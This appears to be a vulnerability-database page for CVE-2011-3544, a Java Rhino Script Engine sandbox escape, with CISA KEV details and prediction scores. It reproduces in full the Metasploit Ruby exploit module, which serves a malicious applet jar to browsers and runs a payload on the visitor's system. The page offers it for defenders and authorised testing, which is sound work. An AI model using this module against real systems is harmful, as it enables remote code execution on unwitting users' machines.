CVE-2011-3544

unknown KEV

Published 2022-03-03 · Modified 2022-03-03

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

An access control vulnerability exists in the Applet Rhino Script Engine component of Oracle's Java Runtime Environment allows an attacker to remotely execute arbitrary code.

CISA KEV

Vendor: Oracle
Product: Java SE JDK and JRE
Due date: 2022-03-24

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18171 remote multiple verified ruby · 3 KB

Metasploit · 2011-11-30

Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)

ruby exploit Source: Exploit-DB

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize( info = {} )
		super( update_info( info,
			'Name'          => 'Java Applet Rhino Script Engine Remote Code Execution',
			'Description'   => %q{
					This module exploits a vulnerability in the Rhino Script Engine that
				can be used by a Java Applet to run arbitrary Java code outside of
				the sandbox.  The vulnerability affects version 7 and version 6 update
				27 and earlier, and should work on any browser that supports Java
				(for example: IE, Firefox, Google Chrome, etc)
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Michael Schierl', # Discovery
					'juan vazquez',    # metasploit module
					'Edward D. Teach <teach@consortium-of-pwners.net>',
					'sinn3r'
				],
			'References'    =>
				[
					[ 'CVE', '2011-3544' ],
					[ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ],
					[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
				],
			'Platform'      => [ 'java', 'win', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						}
					],
					[ 'Apple OSX',
						{
							'ARCH' => ARCH_X86,
							'Platform' => 'osx'
						}
					],
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 18 2011'
			))
	end


	def on_request_uri( cli, request )
		if not request.uri.match(/\.jar$/i)
			if not request.uri.match(/\/$/)
				send_redirect(cli, get_resource() + '/', '')
				return
			end

			print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...")

			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
			return
		end

		paths = [
			[ "Exploit.class" ]
		]

		p = regenerate_payload(cli)

		jar  = p.encoded_jar
		paths.each do |path|
			1.upto(path.length - 1) do |idx|
				full = path[0,idx].join("/") + "/"
				if !(jar.entries.map{|e|e.name}.include?(full))
					jar.add_file(full, '')
				end
			end
			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb")
			data = fd.read(fd.stat.size)
			jar.add_file(path.join("/"), data)
			fd.close
		end

		print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

		handler( cli )
	end

	def generate_html
		html  = "<html><head><title>Loading, Please Wait...</title></head>"
		html += "<body><center><p>Loading, Please Wait...</p></center>"
		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
		html += "</applet></body></html>"
		return html
	end

end

Metasploit modules

exploit_multi/browser/java_rhino rank 600

Java Applet Rhino Script Engine Remote Code Execution

Source fetch failed: fetch_error — view the original via the link above.

References

https://nvd.nist.gov/vuln/detail/CVE-2011-3544

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.